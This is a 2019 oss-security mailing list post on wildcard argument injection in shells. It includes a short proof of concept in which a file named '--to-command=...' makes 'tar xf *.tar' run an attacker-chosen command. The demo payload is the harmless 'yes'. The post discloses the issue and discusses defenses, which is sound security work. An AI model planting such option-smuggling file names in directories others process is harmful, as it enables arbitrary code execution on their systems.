oss-security - Shell wildcards considered dangerous?

Follow @Openwall on Twitter for new release announcements and other news

[<prev] [next>] [thread-next>] [day] [month] [year] [list]

Date: Mon, 9 Dec 2019 15:23:16 +0200
From: Georgi Guninski <gguninski@...il.com>
To: oss-security@...ts.openwall.com
Subject: Shell wildcards considered dangerous?

Remote version of this affects wu-ftpd from 2003:
https://www.debian.org/security/2003/dsa-377

Summary:  For trusted command PROGRAM, executing
PROGRAM *.EXT
may lead to arbitrary code execution, e.g. for
PROGRAM=EXT=tar

The main idea is the wildcard to add program options.

Open problem:

Are popular programs other than tar vulnerable?

Since shell wildcards are unlikely to change, should best practice
include not using *.EXT in shell?

Example exploit vector: starting program in untrusted
directories.

Poc:
====
$rm -rf /tmp/1 ;mkdir /tmp/1 ; cd /tmp/1 ; tar cf a.tar /etc/issue
$ : >  --to-command="yes .tar"

#end creating, starts PoC
tar xf *.tar

#.tar (repeats)
====

-- 
CV:    https://j.ludost.net/resumegg.pdf
site:  http://www.guninski.com
blog:  https://j.ludost.net/blog

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.